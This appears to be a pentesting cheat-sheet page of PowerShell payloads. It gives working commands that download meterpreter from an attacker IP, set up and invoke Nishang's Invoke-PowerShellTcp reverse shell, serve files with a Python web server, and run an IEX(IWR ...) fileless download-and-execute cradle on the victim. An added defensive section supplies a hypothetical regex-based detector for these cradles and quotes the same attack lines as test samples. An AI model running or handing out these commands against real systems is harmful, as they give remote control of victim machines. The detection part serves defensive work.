PowerShell Payloads

Reverse shells and enumeration scripts

cURL

$URL="http://10.9.254.6/meterpreter.exe"
$Path="C:\Users\pentest\meterpreter.exe"

Invoke-WebRequest -URI $URL -OutFile $Path

Reverse Shell

curl https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 > rev.ps1

Add the following line at the end of the script to invoke the function, adjusting the arguments as needed:

Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Start a web server

python3 -m http.server

Download and execute the PowerShell script from the attacker web server (on the victim machine)

powershell.exe (IEX(IWR http://10.10.14.5:8000/rev.ps1 -UseBasicParsing))
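
From the defender's side, the download and execute steps above leave recognizable text in process command lines and script block logs. The following is an added example, not part of the original page or of Nishang: `Find-DownloadCradle`, its rule names and its severity levels are hypothetical, and the sample lines are constructed from the commands shown on this page plus two benign ones.

```powershell
# Added example (not from the original page). Find-DownloadCradle is a
# hypothetical helper; rule names and severity levels are assumptions.
function Find-DownloadCradle {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)][string]$Text)
    begin {
        # Rule name -> regex. -match is case-insensitive by default.
        $rules = [ordered]@{
            WebFetch      = '\b(IWR|Invoke-WebRequest|curl|wget|DownloadString|DownloadFile)\b'
            InlineExecute = '\b(IEX|Invoke-Expression)\b'
            WriteToDisk   = '-OutFile\b'
            RawIpHttp     = 'http://\d{1,3}(\.\d{1,3}){3}'
            NishangTcp    = '\bInvoke-PowerShellTcp\b'
        }
    }
    process {
        # Collect the names of every rule that matches this line.
        $hits = @(foreach ($name in $rules.Keys) {
            if ($Text -match $rules[$name]) { $name }
        })
        # Fetch plus in-memory execution (the IEX(IWR ...) cradle).
        $fileless = $hits -contains 'WebFetch' -and $hits -contains 'InlineExecute'
        # Fetch saved to disk, or fetched from a bare IP over plain HTTP.
        $staged = $hits -contains 'WebFetch' -and
                  ($hits -contains 'WriteToDisk' -or $hits -contains 'RawIpHttp')
        $severity = if ($fileless -or $hits -contains 'NishangTcp') { 'High' } elseif ($staged) { 'Medium' }
        # A lone web request with no other indicator is not reported.
        if ($severity) {
            [pscustomobject]@{ Severity = $severity; Rules = $hits -join ','; Text = $Text }
        }
    }
}

# Constructed sample lines: three modelled on this page, two benign.
$samples = @(
    'powershell.exe (IEX(IWR http://10.10.14.5:8000/rev.ps1 -UseBasicParsing))'
    'Invoke-WebRequest -URI $URL -OutFile $Path'
    'Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444'
    'Invoke-WebRequest -Uri https://intranet.example/health -UseBasicParsing'
    'Get-ChildItem C:\Users -Recurse'
)
$samples | Find-DownloadCradle | Format-Table -AutoSize -Wrap
```

On a real host the same function can be fed the script block text of event ID 4104 from the Microsoft-Windows-PowerShell/Operational log, which requires script block logging to be enabled.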

Projects

HackTricks

Nishang

Framework and collection of payloads for offensive security and pentesting

PowerSploit

Project is no longer supported
